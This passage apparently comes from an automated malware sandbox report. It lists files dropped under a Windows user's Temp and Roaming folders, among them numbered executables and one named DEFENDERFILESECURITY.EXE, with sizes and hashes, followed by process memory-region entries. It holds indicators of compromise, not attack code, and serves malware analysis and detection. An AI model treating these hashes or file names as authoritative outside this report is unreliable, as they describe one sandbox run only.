                              3973bb4390bbd4efb2034694722a59a5843f116b580c2a4fb4676615891cd656f67259324fbe8a4cf5a8849654a6cf599c7c1ffa144724cc9966f0d3aea6684f

                            • C:\Users\Admin\AppData\Local\Temp\xlDQsyUn1K.exe

                              Filesize

                              5KB

                              MD5

                              eff62daebe6a245573c619e4beef2a3a

                              SHA1

                              e4de9e23b124e8289f2942b4a5ed6f304330d8cc

                              SHA256

                              bb54c9a7ad63b674a1afe299d70c0ac67e399d1b055fee7bda03645ee2ae338e

                              SHA512

                              ba9d1d2af417c954ff807e0c30737427d6c7779fbbd35454639aa0526b6e555f4b6e8b0c2d46c76c4a24e092b553f4621794788dccedf3a699d0a437afae43e9

                            • C:\Users\Admin\AppData\Local\Temp\xlDQsyUn1K.exe

                              Filesize

                              5KB

                              MD5

                              eff62daebe6a245573c619e4beef2a3a

                              SHA1

                              e4de9e23b124e8289f2942b4a5ed6f304330d8cc

                              SHA256

                              bb54c9a7ad63b674a1afe299d70c0ac67e399d1b055fee7bda03645ee2ae338e

                              SHA512

                              ba9d1d2af417c954ff807e0c30737427d6c7779fbbd35454639aa0526b6e555f4b6e8b0c2d46c76c4a24e092b553f4621794788dccedf3a699d0a437afae43e9

                            • C:\Users\Admin\AppData\Roaming\1.exe

                              Filesize

                              14.7MB

                              MD5

                              2cbd5d9d43c5c49f0580975e9e620808

                              SHA1

                              17e209b6d6c66882ed78a40d7e0d211760b489a0

                              SHA256

                              399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403

                              SHA512

                              26e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812

                            • C:\Users\Admin\AppData\Roaming\1.exe

                              Filesize

                              14.7MB

                              MD5

                              2cbd5d9d43c5c49f0580975e9e620808

                              SHA1

                              17e209b6d6c66882ed78a40d7e0d211760b489a0

                              SHA256

                              399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403

                              SHA512

                              26e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812

                            • C:\Users\Admin\AppData\Roaming\1.exe

                              Filesize

                              14.7MB

                              MD5

                              2cbd5d9d43c5c49f0580975e9e620808

                              SHA1

                              17e209b6d6c66882ed78a40d7e0d211760b489a0

                              SHA256

                              399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403

                              SHA512

                              26e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812

                            • C:\Users\Admin\AppData\Roaming\2.exe

                              Filesize

                              87KB

                              MD5

                              3c6ccbfe897915f0fe6bc34d193bf4a0

                              SHA1

                              6fe3161ee66e317889066a302474e511220939e7

                              SHA256

                              52bf11364e8430f4b271ebb29e2a55451543338be5b2a34e731ede58eef04241

                              SHA512

                              e0bf1fc11deacb24b5d5de4bcfc522057d1ca1b4866325356b2c9a1f009c6562eee0c0e602478b3639de4beff14997d59a3b428281d9111278544fc5e3199536

                            • C:\Users\Admin\AppData\Roaming\2.exe

                              Filesize

                              87KB

                              MD5

                              3c6ccbfe897915f0fe6bc34d193bf4a0

                              SHA1

                              6fe3161ee66e317889066a302474e511220939e7

                              SHA256

                              52bf11364e8430f4b271ebb29e2a55451543338be5b2a34e731ede58eef04241

                              SHA512

                              e0bf1fc11deacb24b5d5de4bcfc522057d1ca1b4866325356b2c9a1f009c6562eee0c0e602478b3639de4beff14997d59a3b428281d9111278544fc5e3199536

                            • C:\Users\Admin\AppData\Roaming\3.exe

                              Filesize

                              14.7MB

                              MD5

                              6f6b812c166e53dc9b52b9b60e5ed369

                              SHA1

                              e60cf5e718c030182dec6f7fbbbbf884fcdfcca1

                              SHA256

                              ffead35df6bc101476d76393619fe0a06a57d93927417d9bcf814d2e4c6b36a0

                              SHA512

                              8e8e5fe21f4b08a053255beb0f4e55f03e0114e7fa2117b8ef8320e7fd88275771394cd9a7e4237793b370f980ff7ed45a6ff78d3d97d59cd077868e7602f4b9

                            • C:\Users\Admin\AppData\Roaming\3.exe

                              Filesize

                              14.7MB

                              MD5

                              6f6b812c166e53dc9b52b9b60e5ed369

                              SHA1

                              e60cf5e718c030182dec6f7fbbbbf884fcdfcca1

                              SHA256

                              ffead35df6bc101476d76393619fe0a06a57d93927417d9bcf814d2e4c6b36a0

                              SHA512

                              8e8e5fe21f4b08a053255beb0f4e55f03e0114e7fa2117b8ef8320e7fd88275771394cd9a7e4237793b370f980ff7ed45a6ff78d3d97d59cd077868e7602f4b9

                            • C:\Users\Admin\AppData\Roaming\3.exe

                              Filesize

                              14.7MB

                              MD5

                              6f6b812c166e53dc9b52b9b60e5ed369

                              SHA1

                              e60cf5e718c030182dec6f7fbbbbf884fcdfcca1

                              SHA256

                              ffead35df6bc101476d76393619fe0a06a57d93927417d9bcf814d2e4c6b36a0

                              SHA512

                              8e8e5fe21f4b08a053255beb0f4e55f03e0114e7fa2117b8ef8320e7fd88275771394cd9a7e4237793b370f980ff7ed45a6ff78d3d97d59cd077868e7602f4b9

                            • C:\Users\Admin\AppData\Roaming\4.exe

                              Filesize

                              87KB

                              MD5

                              ca699117112a173ca7b289f1baf6c3c0

                              SHA1

                              862f227d4fa0b4de892006d7fe19e610e9f1a676

                              SHA256

                              db805d5ac09ea9d18a3016d4c70cbb52087604fe5ad23fd8043399c970c0c8a6

                              SHA512

                              d9f82f6e18ce2eb624a5ee1e20618318fde7ffdcff834d9c0291f4971bd72ce9b7f5108bf45f11ceed4d1f526bad4842913e833a25e3d99a3235d6f87b4d2620

                            • C:\Users\Admin\AppData\Roaming\4.exe

                              Filesize

                              87KB

                              MD5

                              ca699117112a173ca7b289f1baf6c3c0

                              SHA1

                              862f227d4fa0b4de892006d7fe19e610e9f1a676

                              SHA256

                              db805d5ac09ea9d18a3016d4c70cbb52087604fe5ad23fd8043399c970c0c8a6

                              SHA512

                              d9f82f6e18ce2eb624a5ee1e20618318fde7ffdcff834d9c0291f4971bd72ce9b7f5108bf45f11ceed4d1f526bad4842913e833a25e3d99a3235d6f87b4d2620

                            • C:\Users\Admin\AppData\Roaming\5.exe

                              Filesize

                              1006KB

                              MD5

                              f87fd290c2d08ede25d6a8def9657c07

                              SHA1

                              930e7f35e0d5a43faf19ad75bc41c7efce914a17

                              SHA256

                              a9b2a465ca8b372a9067d8cc4f6ce6404e2501177f5499d343ca88c0bc4665cf

                              SHA512

                              0093b13ab44468c67aceadb04d4cdbbb7486737e8aa0a6aff8e662c308100a6d3bdf4f1cdc630e00d701fa8ec79ed89a8d31ed325bf2c6f05797742aae09db07

                            • C:\Users\Admin\AppData\Roaming\5.exe

                              Filesize

                              1006KB

                              MD5

                              f87fd290c2d08ede25d6a8def9657c07

                              SHA1

                              930e7f35e0d5a43faf19ad75bc41c7efce914a17

                              SHA256

                              a9b2a465ca8b372a9067d8cc4f6ce6404e2501177f5499d343ca88c0bc4665cf

                              SHA512

                              0093b13ab44468c67aceadb04d4cdbbb7486737e8aa0a6aff8e662c308100a6d3bdf4f1cdc630e00d701fa8ec79ed89a8d31ed325bf2c6f05797742aae09db07

                            • C:\Users\Admin\AppData\Roaming\6.exe

                              Filesize

                              4.2MB

                              MD5

                              b60e44033994d1fde9a4b6f1338bfa04

                              SHA1

                              7f2cd8091276040ca011174269112099ec3e9bef

                              SHA256

                              baaa098832eb5790a1fabfdc6284eecffdd74a914ea1312c0f413cc5bb814a7e

                              SHA512

                              a8776d7ce2bffa25cefe789bf8f5a4b5b0b81ef53cd0c783ded1be9ee0f976c6c2a3bd41a4d9c05eb15910051d3cfe490c6390b7029d370ad71487c88416c574

                            • C:\Users\Admin\AppData\Roaming\6.exe

                              Filesize

                              4.2MB

                              MD5

                              b60e44033994d1fde9a4b6f1338bfa04

                              SHA1

                              7f2cd8091276040ca011174269112099ec3e9bef

                              SHA256

                              baaa098832eb5790a1fabfdc6284eecffdd74a914ea1312c0f413cc5bb814a7e

                              SHA512

                              a8776d7ce2bffa25cefe789bf8f5a4b5b0b81ef53cd0c783ded1be9ee0f976c6c2a3bd41a4d9c05eb15910051d3cfe490c6390b7029d370ad71487c88416c574

                            • C:\Users\Admin\AppData\Roaming\7.exe

                              Filesize

                              14.7MB

                              MD5

                              533f876556e02dec453f6fa4c2536967

                              SHA1

                              a4abdc1e4b26623e2be6c3715c1a75a5a6e2c397

                              SHA256

                              cd2c63e16f4c1e79e7763c278146acae54dca752c25ad46d47167f69d70d714a

                              SHA512

                              3935d864faa3e7c32e6a4fa2a7ab01a9ae2c103531a73df1a6500ce78321f86623e3e9d7be74535ff0bd09382462915239f263c9466cb8ef6437c48a55fcb47a

                            • C:\Users\Admin\AppData\Roaming\7.exe

                              Filesize

                              14.7MB

                              MD5

                              533f876556e02dec453f6fa4c2536967

                              SHA1

                              a4abdc1e4b26623e2be6c3715c1a75a5a6e2c397

                              SHA256

                              cd2c63e16f4c1e79e7763c278146acae54dca752c25ad46d47167f69d70d714a

                              SHA512

                              3935d864faa3e7c32e6a4fa2a7ab01a9ae2c103531a73df1a6500ce78321f86623e3e9d7be74535ff0bd09382462915239f263c9466cb8ef6437c48a55fcb47a

                            • C:\Users\Admin\AppData\Roaming\8.exe

                              Filesize

                              87KB

                              MD5

                              70488131ff53f7f73f351f27f86a10ce

                              SHA1

                              fce5bc2ff5d38c068de759868a6ddfb023cb3ca8

                              SHA256

                              308f16cf7000655a28f21e6d159ac68740d6c8437b2a83baaa563912a2bf7a19

                              SHA512

                              127f8e35ae15360fe1ea35523adc29ee28ee6e7bb1b66fb5eebcbb008c3a6a7cd99e9d0ad1f253c6a24a0183d99513675526ec5e0265390377e5f90cc5073197

                            • C:\Users\Admin\AppData\Roaming\8.exe

                              Filesize

                              87KB

                              MD5

                              70488131ff53f7f73f351f27f86a10ce

                              SHA1

                              fce5bc2ff5d38c068de759868a6ddfb023cb3ca8

                              SHA256

                              308f16cf7000655a28f21e6d159ac68740d6c8437b2a83baaa563912a2bf7a19

                              SHA512

                              127f8e35ae15360fe1ea35523adc29ee28ee6e7bb1b66fb5eebcbb008c3a6a7cd99e9d0ad1f253c6a24a0183d99513675526ec5e0265390377e5f90cc5073197

                            • C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE

                              Filesize

                              532KB

                              MD5

                              84e6aa267c6970d2d777d60840390102

                              SHA1

                              c97e555e98c5bec69bcad9607cf0153ff827a141

                              SHA256

                              69f7c84e27083e5af30a91c797c6c1d5b694c2926ebb8a9edb7c6ed8e4c3cb3c

                              SHA512

                              47184ca58f7358bad24acbcfc2038a510a1ae55b90b927d79a98df13c0e911daeaadb1100f0dc112370fe61bf6264fb9ff214d143d17af659e0bd1ba16f0cecc

                            • C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE

                              Filesize

                              532KB

                              MD5

                              84e6aa267c6970d2d777d60840390102

                              SHA1

                              c97e555e98c5bec69bcad9607cf0153ff827a141

                              SHA256

                              69f7c84e27083e5af30a91c797c6c1d5b694c2926ebb8a9edb7c6ed8e4c3cb3c

                              SHA512

                              47184ca58f7358bad24acbcfc2038a510a1ae55b90b927d79a98df13c0e911daeaadb1100f0dc112370fe61bf6264fb9ff214d143d17af659e0bd1ba16f0cecc

                            • memory/112-173-0x0000000000490000-0x0000000000498000-memory.dmp

                              Filesize

                              32KB

                            • memory/112-195-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/400-170-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/400-154-0x0000000000870000-0x0000000000878000-memory.dmp

                              Filesize

                              32KB

                            • memory/400-247-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/528-252-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/528-260-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/528-203-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/868-235-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/868-263-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/1440-222-0x0000000000D40000-0x0000000000D48000-memory.dmp

                              Filesize

                              32KB

                            • memory/1440-236-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/1544-132-0x0000000000B50000-0x0000000000BFA000-memory.dmp

                              Filesize

                              680KB

                            • memory/1724-240-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/1724-265-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/1900-165-0x0000000000A60000-0x0000000000A68000-memory.dmp

                              Filesize

                              32KB

                            • memory/1900-178-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/1960-234-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/1960-262-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/2240-276-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/2240-230-0x00000000003D0000-0x00000000003D8000-memory.dmp

                              Filesize

                              32KB

                            • memory/2240-238-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/2372-185-0x000001E9B4F70000-0x000001E9B4F92000-memory.dmp

                              Filesize

                              136KB

                            • memory/2372-246-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/2372-199-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/2624-226-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/2624-250-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/2736-261-0x00000000052F0000-0x0000000005894000-memory.dmp

                              Filesize

                              5.6MB

                            • memory/2736-258-0x00000000005A0000-0x00000000005BC000-memory.dmp

                              Filesize

                              112KB

                            • memory/2876-233-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/2876-218-0x0000000000760000-0x0000000000768000-memory.dmp

                              Filesize

                              32KB

                            • memory/3104-200-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/3104-251-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/3104-183-0x0000000000DC0000-0x0000000000DC8000-memory.dmp

                              Filesize

                              32KB

                            • memory/3128-215-0x00007FF62C5A0000-0x00007FF62C703000-memory.dmp

                              Filesize

                              1.4MB

                            • memory/3128-149-0x00007FF62C5A0000-0x00007FF62C703000-memory.dmp

                              Filesize

                              1.4MB

                            • memory/3232-142-0x00007FF6CA560000-0x00007FF6CA6BF000-memory.dmp

                              Filesize

                              1.4MB

                            • memory/3232-145-0x00007FF6CA560000-0x00007FF6CA6BF000-memory.dmp

                              Filesize

                              1.4MB

                            • memory/3324-231-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/3324-259-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/3496-242-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/3708-212-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/3708-273-0x0000000000400000-0x0000000000412000-memory.dmp

                              Filesize

                              72KB

                            • memory/3708-229-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/3708-209-0x0000000000F50000-0x0000000000F58000-memory.dmp

                              Filesize

                              32KB

                            • memory/3840-194-0x0000000000BB0000-0x0000000000BB8000-memory.dmp

                              Filesize

                              32KB

                            • memory/3840-210-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/3928-135-0x0000000000400000-0x0000000000497000-memory.dmp

                              Filesize

                              604KB

                            • memory/3928-136-0x0000000000400000-0x0000000000497000-memory.dmp

                              Filesize

                              604KB

                            • memory/3928-138-0x0000000000400000-0x0000000000497000-memory.dmp

                              Filesize

                              604KB

                            • memory/3928-134-0x0000000000400000-0x0000000000497000-memory.dmp

                              Filesize

                              604KB

                            • memory/3928-143-0x0000000000400000-0x0000000000497000-memory.dmp

                              Filesize

                              604KB

                            • memory/4264-197-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/4264-192-0x0000000000D00000-0x0000000000D08000-memory.dmp

                              Filesize

                              32KB

                            • memory/4264-213-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/4496-239-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/4644-272-0x0000000005430000-0x0000000005A58000-memory.dmp

                              Filesize

                              6.2MB

                            • memory/4644-269-0x0000000004DC0000-0x0000000004DF6000-memory.dmp

                              Filesize

                              216KB

                            • memory/4644-277-0x0000000005B40000-0x0000000005BA6000-memory.dmp

                              Filesize

                              408KB

                            • memory/4644-274-0x00000000053B0000-0x00000000053D2000-memory.dmp

                              Filesize

                              136KB

                            • memory/4644-275-0x0000000005AD0000-0x0000000005B36000-memory.dmp

                              Filesize

                              408KB

                            • memory/4652-177-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/4652-179-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/4652-162-0x00000000008E0000-0x00000000008E8000-memory.dmp

                              Filesize

                              32KB

                            • memory/4996-206-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/4996-249-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/5076-241-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/5096-248-0x0000000000040000-0x0000000000EF0000-memory.dmp

                              Filesize

                              14.7MB

                            • memory/5152-351-0x0000000000400000-0x0000000000412000-memory.dmp

                              Filesize

                              72KB

                            • memory/5868-356-0x0000000000400000-0x0000000000412000-memory.dmp

                              Filesize

                              72KB

                            • memory/6048-313-0x0000000000400000-0x0000000000412000-memory.dmp

                              Filesize

                              72KB